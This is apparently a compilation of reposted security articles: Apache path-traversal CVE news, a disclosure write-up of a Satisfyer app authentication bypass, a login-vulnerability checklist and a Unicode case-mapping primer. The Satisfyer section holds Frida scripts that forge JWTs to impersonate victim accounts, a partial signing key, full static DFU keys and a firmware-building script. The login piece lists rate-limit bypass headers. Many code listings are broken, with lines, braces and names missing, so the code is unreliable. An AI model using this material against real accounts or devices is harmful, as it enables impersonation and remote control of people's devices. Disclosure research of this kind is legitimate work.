New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks

New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks

Original text by Ravie Lakshmanan

The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an «incomplete fix» for an actively exploited path traversal and remote code execution flaw that it patched earlier this week.

CVE-2021-42013, as the new vulnerability is identified as, builds upon CVE-2021-41773, a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.

Although the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the «mod_cgi» module was loaded and the configuration «require all denied» was absent, prompting Apache to issue another round of emergency updates.

«It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,» the company noted in an advisory. «If files outside of these directories are not protected by the usual default configuration ‘require all denied’, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.»

Apache credited Juan Escobar from Dreamlab Technologies, Fernando Muñoz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it’s «seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,» urging «organizations to patch immediately if they haven’t already.»

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I’ve re-discovered the butthax talk which covered security aspects of Lovense devices. I’ve felt so inspired, that I’ve decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many Controller classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the ToyHolderController class, like many others, implements the sendBuffer() method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");

        var stringbuilder = stringbuilderclazz.$new();
        console.log("Buffer: " + stringbuilder.toString());

        // call original


Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated to a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 66 is the maximum value for the vibration level. As an example how the communication could be manipulated with Frida, I’ve decided to modify the list of bytes sent to the device to use the value 100 instead:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');
    var listclazz = Java.use("java.util.List");
    var arrayclazz = Java.use("java.util.Arrays");

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte array containing the value 100
        var byteList = Java.use('java.util.ArrayList').$new();
        var theByte = Java.use('java.lang.Byte').valueOf(100);

        lst.set(0, byteList);
        lst.set(1, byteList);

        var stringbuilder = stringbuilderclazz.$new();
        console.log("Buffer: " + stringbuilder.toString());

        // call the original method with the modified parameter


This worked and changed the scripts output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, too long lists or things like that caused the device to ignore these input values.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. It’s interesting that the client and not the server is responsible for generating the initial JWT:

public final class JwtTokenBuilder {
    public JwtTokenBuilder() {


    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            return object;

As can be seen, createJwtToken() uses a JWT signing key originating from a native library called It then signs and uses JWTs like the following:


After reviewing the authentication flow, I’ve determined that there exist (at least) these roles:

  • ROLE_ANONYMOUS_CLIENT is any client that communicates with the Satisfyer API and is not logged in.
  • ROLE_USER is a client that has successfully logged in. Ever API request is scoped to information that’s accessible to this specific user account.

An authentication token for a signed in user looks as follows:


While the Android app is responsible for generating the initial JWT with role ROLE_ANONYMOUS_CLIENT, the server responds with a new JWT after successfully performing a login. This new JWT uses the role ROLE_USER, as can be seen above.

Would it be possible to use the signing key residing in the shared library to not just sign JWTs with ROLE_ANONYMOUS_CLIENT, but also with ROLE_USER? This would let an attacker to interact with the API in the name of someone else. Let’s find out.

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as ROLE_USER. Please note the value of the statusDescription in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the JwtBuilder interface to create and sign JWTs. The only class implementing this interface is DefaultJwtBuilder, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the auth claim from ROLE_ANONYMOUS_USER to ROLE_USER.
  • Add a hook to add another claim called user_id, indicating the desired user ID of the victim’s account.
  • Change the JWT subject (sub) from Satisfyer (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var clazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    clazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;

    var clazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    clazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");

    console.log("[+] Hooking complete")

This worked just fine and generated a forged JWT when starting the app:

$ python3
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag from the View class which is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app, so that I could use features like remote control and calls more easily. I came up with a Frida script to generate and add a forged JWT into the app’s local storage. This happens just before the app is going to check if a valid JWT already exists using the hasToken() method:

var clazz = Java.use("");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject token into shared preferences and add bogus values to make the app happy
    return this.hasToken();

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.

To summarize, the impact of this is quite interesting, since an attacker can now pose as any given user. Next to the ability to send messages as that user, access to the friends list of this compromised account is now possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could now hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes that their account is being impersonated, even changing the password doesn’t help, since the attack doesn’t even require that to be known.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.

Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than ROLE_ANONYMOUS_CLIENT, should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.

Dumping the JWT Signing Key

For completeness sake, I’ve dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x000009bc]> afl
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366

As you can see, a static key is loaded from address 0x843.

That was too easy, let’s check other methods to dump the key.

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method getReleaseKey() is declared as native. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the native Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida Interceptor to print the value returned by the getReleaseKey() export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"),{
    onEnter: hookEnter,
    onLeave: hookLeave

function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");

    // if it would return a byte[] instead of String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for(var i = 0; i < buffer.length; ++i){
        result += (String.fromCharCode(buffer[i]));

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the x1 register at offset 0xb4c are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset 0xb4c to this address
  • Add a trace command for this address to dump the contents of the x1 register
  • Trigger the key generation

Let’s see how it works

After triggering the generation of a JWT, tracing kicks in and dumps the value of x1, which is a pointer to the hardcoded string.

As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.

This sounds different than what the Satisfyer app is currently using, since it uses an admin account with a static password. In fact, coturn servers offer a web interface that’s only reachable via HTTPS that allow admin users to login. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let’s just hope this panel is not accessible, right? RIGHT?

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something into a test device is a firmware package of the vendor. Unfortunately, all of my Satisfyer devices were already shipped to me with up-to-date firmware. There’s an API endpoint that allows downloading firmware images but it requires brute forcing various parameter values and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I’ve found a way to trigger the update process, that is calling updateFirmware(path) of the class ToyHolderController. A great way to see what’s actually going on is to place hooks in any classes used for logging purposes. In case of Satisfyer Connect, the ZLogger class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED

Based on the debug messages, I’ve started to build a file that can be flashed on the device. I’ve lost interest in that shortly after but in case my results are helpful for anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

FILE = ""

# header
FILE += "\x47\x4D"

# sizeOfMergedFile
FILE += "\x3e\x00\x00\x00"


# extension
FILE += "\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += "\x01\x00\x00\x00"

# start addr
FILE += "\x10\x00"

# download addr
FILE += "\x10\x00"

FILE +="\x05\x00\x00\x00"

FILE += "ZZaa"

### image file 1

# ic version
FILE += "\x05"

# secure version
FILE += "\x00"

# no idea
FILE += "\x13\x37"

# image id
FILE +="\x01\x01"

# crc16
FILE += "\x8e\x04"

# size
FILE +="\x40\x00\x00\x00"

for i in range(0x40):
    FILE += "A"

with open("./thefile.bin", "w") as f:

If anybody happens to have a flashable Satisfyer .bin file lying around, I’ll offer $13.37 PayPal for it, I swear.


  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to and
  • 06/30/2021: Received acknowledgement, agreed that blog post will be released in max. two weeks, or before in case the vulnerability was fixed earlier.
  • 07/14/2021: Publishing blog post.

10 Most Common Security Issues Found in Login Functionalities

10 Most Common Security Issues Found in Login Functionalities

Original text by Harsh Bothra

During penetration testing and vulnerability assessment, the login functionalities are often encountered in some way or another. Most of the time, they are public-facing login portals where any user can attempt to log in to gain access to their accounts; on the other hand, sometimes, these login panels are restricted to specific users. The login functionality acts as a gateway that you need to unlock successfully to further access the application to its full potential. From a threat actor’s perspective, the login functionality is the main barrier to gain an initial foothold. Hence, it is essential from a penetration tester’s perspective to ensure that the login functionality implemented in the application is robust and secure against all types of vulnerabilities and misconfigurations.

This blog will discuss the common vulnerabilities or misconfigurations that a threat actor can exploit on login functionality and some remediations around it. For this purpose, we will be following the mindmap as mentioned above:

Vulnerability Test Cases

Default Credentials

Often, on the admin panels, third party software integrations, etc., that come with a pair of default credentials are left as it is. This may allow an attacker to enumerate the third party service and look for its default credentials. These credentials are usually privileged admin users and may allow an attacker to gain a complete foothold in the application.

Default Credentials List:

For example, an admin panel using default credentials such as “admin:admin” is easy to guess and may allow an attacker to gain access to the respective admin panel as the highest privileged user.

Remediation: To remediate this issue, the developers need to ensure that the default credentials are disabled/changed and a strong pair of non-guessable credentials are enforced.

User Enumeration

There are multiple scenarios where when a user provides an invalid username, the application responds with a verbose error message stating that the user doesn’t exist. There are other ways to identify this as well, such as:

  1. Error Message: Difference in the error message when a valid/invalid user name is provided.
  2. Timing Difference: Difference in server response timing when a valid/invalid user name is provided.
  3. Application-Specific Behaviour: In specific scenarios, there may be behaviour patterns that are specific to the application’s implemented login flow, and it may require additional observation to conclude if a user exists or not.

These issues may allow a threat actor to enumerate all the valid user’s of the application and further use them to perform targeted attacks such as brute-forcing and social engineering.

Remediation: To remediate this issue, the developers need to implement proper handling so that the application doesn’t reveal any verbose error message on a valid/invalid username. Only a generic message is displayed. Similarly, the timing difference should not be significant enough to allow user enumeration.

Missing Brute-Force Protection

Most of the time, the login pages are accessible to the world, and the application allows any user to register and log in. In this chance, a user might have used a weak or guessable password increase. Suppose an application allows a user to attempt login irrespective of the failed attempts and fails to block the attempt. In that case, it may give a threat actor a window of opportunity to perform a brute-force attack and guess the password of the victim user. 

Bypass Methods: Often the application implementation a rate limiting or captcha mechanism to restrict the brute-force attempts, however, there are multiple methods to bypass this implementation including but not limited to: 

  1. Using the various HTTP Request Headers such as below mentioned. You can find Top Headers in the dataset from Project Resonance Wave 2.
    • X-Originating-IP:
    • X-Forwarded-For:
    • X-Remote-IP:
    • X-Remote-Addr:
    • X-Client-IP:
    • X-Host:
    • X-Forwared-Host:
  2. Using null bytes (%00) in the vulnerable parameters
  3. Sending the request without captcha parameter
  4. Adding fake parameters with the same “key”:”value”
  5. Limiting the threads or checking for race conditions
  6. Changing user-agents, cookies, and IP address
  7. Using IP rotation Burp Extensions to bypass IP based restrictions

To test this issue, simply use Burp’s Intruder feature or any custom brute-force script with a password wordlist of 200 passwords having an actual password in the list. Suppose the application doesn’t restrict the invalid attempts and provides a successful response on a valid password. In that case, it is an indication that the application doesn’t implement any sort of brute-force protection.


Remediation: To remediate this issue a developer may implement rate-limiting or CAPTCHA as an anti-automation mechanism. 

Credentials Over Unencrypted Channel

If the application accepts the credentials and logs in a user over an unencrypted communication channel, i.e. over HTTP protocol instead of HTTPS, the communication is vulnerable to man in the middle attack. An attacker may be able to sniff in the network and steal sensitive information.


Remediation: To remediate this issue, the developers need to strictly enforce HTTPS so that the application doesn’t communicate over HTTP. As a best practice, the developers should implement HSTS headers across all the subdomains as well.

Additionally, implementing Secure Flag on the session cookies that were fetched after login over HTTPS, ensures that the cookies are not stolen over the unencrypted channel. The secure flag protects cookies to be stolen over an unencrypted channel or via attacks like man-in-the-middle attack.

Cross-Site Scripting

The login pages may also be vulnerable to cross-site scripting under multiple scenarios. However, these are generally authenticated but can still be used to perform malicious actions such as redirecting a user to an attacker-controlled website and social engineering them to get hold of their credentials.

Let’s assume an application having a login page reflects the invalid username in the error message. This username is also present in the URL like:; now, an attacker may attempt to execute a reflected type of cross-site scripting in the user parameter by sending a malicious javascript payload. 

Remediation: To remediate this issue the developers can implement a proper input validation and sanitising on the input fields and not reflect user-supplied input in the error messages.

Additionally, implementing a HTTPOnly flag on the session cookies can protect sensitive cookies from being stolen using scripting attacks.

Parameter Pollution & Mass Assignment

A simple security misconfiguration may allow an attacker to bypass the authentication and gain unauthorised access to the victim user’s account. In this attack scenario, an attacker may attempt to bind multiple values to the same key or define various key-value pairs, i.e. using multiple usernames in username parameters or using multiple username parameters themselves. The way a server processes this may allow an attacker to access another user’s account.


Remediation: To remediate this issue, the developers need to ensure that the application discards the use of multiple key-value pairs and only accepts one at a time to avoid this attack. Also, developers would need to check if any additional parameter is added to the original request and discard all the additional parameters, accepting the originally supplied parameters only. 


This is one of the most common attacks that comes to one’s mind when we talk about login functionality. Based on the implementation used in the login functionality, an attacker may attempt to bypass it by injecting SQL/NoSQL/LDAP/XML injection payloads and gain access to the victim’s account.


Remediation: To remediate this issue, the developers must ensure that the user-supplied input is validated correctly and security best practices for implementing database queries are followed. You can find a detailed guide at:

Sensitive Information Disclosure

While performing a login action, it is often observed that some applications store the credentials in response or the javascript files. An attacker may attempt to identify a way to extract the credentials from the response or javascript files. Also, in some cases, the application access may show additional information that may belong to other users or the application server itself and may help further exploitation.


Remediation: To remediate this issue, the developers must ensure that the application doesn’t cache or store sensitive information such as credentials in an insecure place such as server response or javascript files.

Response Manipulation

Often, it is observed that the application returns “success”:false or “success”:true or similar responses when an invalid vs a valid set of credentials is supplied. However, if the application is not performing the server-side validation properly, it is possible to manipulate the response; for example, changing the “success”:false to “success”:true may allow an attacker to gain unauthorised access to the victim’s access account. This attack mainly results in success where the authentication token or cookie generation logic lies at the client-side, which is a bad practice.

Similarly, in many scenarios, the application also uses different response status codes such as 403, 200, etc. It is possible to change the status code from 403 to 200 to bypass the restriction and attempt to gain successful access to the victim’s account.

Remediation: To remediate this issue, the developers need to make sure that the server-side validation is in place and any attempts of client-side manipulation are discarded.

Authentication Bypass

In certain situations, it is impossible to bypass the authentication directly. Still, it is possible to access some specific endpoints or pages by directly navigating to them or in any other way possible. This allows an attacker to bypass the restrictions of required authentication and allows an unauthorised attacker to access those functionalities.

For Example: An unauthenticated attacker performs a directory enumeration and identifies an endpoint /goto/administrator/ which is directly accessible to him without any restrictions.

Remediation: To remediate this issue, developers would be required to ensure that all the authenticated endpoints are adequately placed behind the authentication and a proper authorisation check is implemented.

Bonus: Cross-Site Request Forgery (with a twist)

Usually, most applications are vulnerable to log in based CSRF issues, but there is no security impact in general. Thats’s what you are thinking, right? However, when an application utilizes the Single Sign-On method, the login CSRF comes in handy. This may allow an attacker to connect the victim user’s account to an attacker-controlled entity and can further be used to steal sensitive information or perform malicious actions. 

Example Report:

Remediation:  To remediate this issue, the developers must ensure that the state parameter is implemented and appropriately validated.

Apart from the above-mentioned vulnerabilities in the login page, several other vulnerabilities arise when third party integrations are used for authentication such as SAML, OAuth2.0 or other third party services. However, these authentication mechanisms are themselves a vast topic to understand and explore. We will soon be coming up with a separate series on Single Sign On (SSO) and JWT related attack vectors.

Unicode for Security Professionals

Unicode for Security Professionals

Original text by Philippe Arteau

Unicode is the de-facto standard for multilingual character encoding. UTF-8 is the most popular encoding used that supports its hundreds of thousands of characters. Aside from the encoding (byte representation of characters), Unicode defines multiple transformations that can be applied to characters. For instance, it describes the behavior of transformations such as Uppercase.

Unicode for Security Professionals

The character known as Long S “ſ” (U+017F) will become a regular uppercase S “S” (U+0053). Unexpected behavior for developers can often lead to security issues. Today, we will dive into the case mapping and normalization transformations. You will see how they can contribute to logic flaws in code.

Along with this article, we are sharing a list of API to look for in source code audit. We are also publishing an interactive cheat sheet for character testing.

Unicode Transformations

Case Mapping

Unexpected behavior in transformations can sometimes lead to bugs, some of them affecting software security. While the strings “go\u017FFecure” and “gosecure” are not equal, a code that applies the uppercase transformation to both strings could mistakenly interpret both strings as being equal.

> "go\u017Fecure".toUpperCase().equals("gosecure".toUpperCase())
> true


Aside from the uppercasing and lowercasing, there is normalization which is also specified by Unicode. The purpose of normalization is to simplify expressions to allow matching equal or equivalent “meaning”. The comparison could be useful when implementing a search or a sort feature for example.

For simplification, we will group the forms NFC and NFD (Normalization Form Canonical Composition/Decomposition) together and do the same with NFKC and NFKD (Normalization Form Compatibility Composition/Decomposition). While their behaviors are not the same, it is identical for the characters that interest us.


NFC/NFD is the most common form of normalization. You are likely to see it used internally in some of the functions in your favorite language. It is much stricter compared to NFKC/NFKD. There are only three characters that will normalize to ASCII characters.

  Original Character  Normalized Character
  ; (U+037E)  ; (U+003B)
  ` (U+1FEF)  ` (U+0060)
  K (U+212A)  K (U+004B)


On the other hand, NFKC is a looser method of representing the equivalence of characters. It will decompose a symbol that contains multiples letters. It will also simplify exponents and stylized characters. With this normalization form, 610 characters will produce ASCII characters. Here are a few examples.

  Original Character  Transform Character
  ª (U+00AA)  a (U+0061)
  ℋ (U+210B)  H (U+0048)
  Ⓐ (U+24B6)  A (U+0041)
  ㍲ (U+3372)  da (U+0064 U+0061)
  ﹤ (U+FE64)  < (U+003C)
  … and more  …

How does vulnerable code look like? Security bugs revolve around logic flaws. Conditions that cannot be crossed become so, thanks to permissive Unicode comparisons. An example of a logic flaw is the one that affected Django and Github: password reset based on email submission.

Here is an example of a faulty logic. In this password reset form from Django, an email value is received, the user information is fetched and an email is sent to each user that were matched. The issue is that the search is case insensitive. A special Unicode character can be used to trigger a collision. Special Unicode characters have the chance to be converted to punycode when sent to the SMTP service.

class PasswordResetForm(forms.Form):
    def save(self, [...]):
        //Email from user input
        email = self.cleaned_data["email"]
        // [...]
        //Search for an email - Case _insensitive_
        for user in self.get_users(email): 
            //Send an email with the original email

Source: [django/contrib/auth/]

This code was fixed by using the email already stored in the database. This way even the reset form is only sent to the original email entered by the user.

Differences in programming languages

Transformations are expected to be standardized [1] [2]. We compared the implementation in various languages. The normalizations transformation NFC, NFD, NFKC and NFKD were identical, however, the case mapping did have some small differences.

Unicode characters producing ASCII character with lowercase transformation

  Character  Result  Python  Ruby  Java  C#  Go  PHP  PHP (mb_*)
  İ (U+0130)  i̇ (U+0069 U+0307)  x  x  x  x      x
  K (U+212A)  k (U+006B)  x  x  x  x      x

Unicode characters producing ASCII character with uppercase transformation

  Character  Result  Python  Ruby  Java  C#  Go  PHP  PHP (mb_*)
  ß (U+00DF)  SS
  x  x  x  **      x
  ı (U+0131)  I
  x  x  x  x  x    x
  ʼn (U+0149)  ʼN
  x  x  x        x
  ſ (U+017F)  S
  x  x  x  x  x    x
  ǰ (U+01F0)  J̌
  x  x  x        x
  ẖ (U+1E96)  H̱
  x  x  x        x
  ẗ (U+1E97)  T̈
  x  x  x        x
  ẘ (U+1E98)  W̊
  x  x  x        x
  ẙ (U+1E99)  Y̊
  x  x  x        x
  ẚ (U+1E9A)  Aʾ
  x  x  x        x
  ff (U+FB00)  FF
  x  x  x        x
  fi (U+FB01)  FI
  x  x  x        x
  fl (U+FB02)  FL
  x  x  x        x
  ffi (U+FB03)  FFI
  x  x  x        x
  ffl (U+FB04)  FFL
  x  x  x        x
  ſt (U+FB05)  ST
  x  x  x        x
  st (U+FB06)  ST
  x  x  x        x

There are four main observations to extract from the previous grid.

The first is that PHP does not have potential side effects when applying strtolower() or strtoupper(), it will only transform ASCII characters. When a PHP developer is introducing Unicode lowercasing, it is done willingly using the multibyte function mb_strtolower. PHP used to provide aliasing (overloading) for the multibyte version of those functions. This is likely to introduce unexpected behaviors because the original code might not have been built with Unicode support in mind.

